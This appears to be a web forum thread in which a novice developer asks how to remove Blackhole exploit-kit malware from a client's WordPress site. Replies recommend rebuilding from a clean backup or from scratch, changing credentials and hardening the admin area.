Im a new developer and a client site is infected with malware.
just registered on the site as Ive run into a roadblock and have absolutely no idea what to do. I starting learning html/css/js about 2 years ago and started "helping"/taking clients to get some experience professionally.
I'm not overly affluent outside basic front end but am capable of using google/learning. Anyhow to the point. A site i built that I wont disclose (its got auto-download JS malware) has been infected.
At first i did a site scan through Sucuri that turned up 3 potential risks - i researched the ones there, did some updates to plugins and CMS versions and somehow that uncovered 19 more malicious files.
At this point I have no idea what to do? Is it smarter to just advise the client to pay the 120$ through online security companies to clean the site or is there an easier way for me to manage this?
If I'm being unclear, i apologize, still in the middle of learning
If you have any advice or questions, please let me know.
So that "scan" turned up the name of :
Malware entry: MW:EXPLOITKIT:BLACKHOLE1
Malware entry: MW:JS:160
This is where i start researching like a SOB, found a free copy of virus scan software and removed a blackhole trojan (Viruses, Cookies, Trojans Quarantined: JS/Exploit-Blacole.eu) from my comp within 2 days of this discovery.
From there I logged into the dashboard of Wordpress and installed "Anti-Malware by GOTMLS.net and scanned the site again after doing all the updates to the site.
It is certainly compromised. You will need to update it via a clean back up. If you don't have one then unfortunately you need to start from scratch, change your FTP access info and use a freshly made new database with a new username and password.
This is because you have no idea what files have been compromised beyond the files that have been added on.
In future try and make sure that you use as many security tools as possible to keep your website secure. Use strong passwords.
1) You should be able to find security tools/plugins that will actively deny SQL injections, ddos attempts and so forth. I've stayed away from WP for quite some time now so I wouldn't be particularly up to date with these. Other things include htaccess modifications, password protecting the admin directory. If you just google for security tips relating to Wordpress you should find a tonne of useful sites.
3) It is extremely unlikely the old developer did this. More likely is one or both of two scenarios not including SQL injection, a) the previous developer was complacent with password and security and or b) they downloaded the template/plugin from a source other than the author's website if they used one. Maybe a warez type website which will often provide modified templates preloaded with the vulnerability inside.
Due to the vast array of possibilities there's not much point in clutching at straws of which there are countless amounts.
Re side note; most hackers will try to first find what CMS you are using. The easiest way to get to that is either with the generator tag which makes it obvious or the admin directory. The most popular use default settings or cannot be changed like Wordpress/Joomla for instance. They also tend to give the first user a default user ID based, the first always being a super admin user. It makes these installations a lot easier to attack with an injection.
As such it is highly recommended that you add an extra layer of security to these directories or try limit access however best possible. The redirects I mentioned are useful to make it seem a file or directory does not exist.
I would say that it is best that you start all over.
Common security holes are poorly programmed CMS modules/plugins, usually web forms that don’t do enough security checks for their input. Spammers then usually insert hidden iframes into the site that load the malware. Also, it has been noted that some Wordpress themes are compromised or specifically programmed with obfuscated code that could be malware. A good read on this is at http://wpmu.org/why-you-should-never...anywhere-else/. Another thing that’s good to know is that some malware/spam robots look for characteristic code sequences or text strings in the HTML source code, such as meta tags with clear indication about which CMS is used, and which version (things like “powered by Wordpress” or similar). That way they can easily find out who is using a system with known security holes. So always remove these version notes or any indication about the CMS used if possible.
That said, I can only agree with evo in that it’s best to remove everything and reinstall from scratch. It should usually suffice to delete all files from the server and clear/delete the database to clean up a webspace (changing all passwords (FTP/database) is advisable, too). If the host’s servers aren’t infected themselves (which we can usually assume they aren’t) that should get rid of any malware that affects your site because after all, malware is just software and consisting of regular files, too.
Also, there are a few security measures you can add with a few htaccess rules to block known evil scripts, for example.